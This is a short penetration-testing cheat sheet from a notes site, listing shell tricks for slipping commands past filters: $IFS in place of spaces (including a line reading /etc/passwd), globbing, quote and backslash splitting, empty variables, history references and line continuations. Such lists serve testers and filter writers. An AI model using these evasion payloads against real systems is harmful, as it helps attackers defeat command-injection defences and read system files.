pwny.cc
Search…
Bypasses

Bypass Paths and Forbidden commands

1
#Bypass space restrictions
2
cat$IFS/etc/passwd #Equals to cat /etc/passwd
3
4
#Bypass with [email protected]
5
echo $0 #Equals to /bin/sh
6
echo whoami|$0 #Equals to whoami | /bin/sh
7
8
#Bash substitudes
9
/usr/bin/wh?ami #Equals to /usr/bin/whoami
10
/usr/bin/wh*ami #Equals to /usr/bin/whoami
11
12
#Concatenation
13
'w'h'o'a'm'i #Equals to whoami
14
\w\h\o\a\m\i #Equals to whoami
15
16
#Uninitialized variables
17
w${u}h${u}o${u}a${u}m${u}i #Equals to whoami. Used {} to put uninitialized vars between chars
18
$u/usr$u/bin$u/whoami #Equals to /usr/bin/whoami. Used uninitialized vars without {} before any symbol
19
20
#Fake commands
21
w$(u)h$(u)o$(u)a$(u)m$(u)i #Equals to whoami. Will try to execute "u" 5 times without success
22
w`u`h`u`o`u`a`u`m`u`i #Equals to whoami. Will try to execute "u" 5 times without success
23
24
#Concatenation of strings using history
25
!-1 #Reference to last command executed. !-2 Reference to the penultimate command executed
26
mi #Throw an error
27
whoa #Throw an error
28
!-1!-2 #Equals to whoami
29
30
#Bypass using new lines
31
w\
32
h\
33
o\
34
a\
35
m\
36
i\ #Equals to whoami
Copied!
Copy link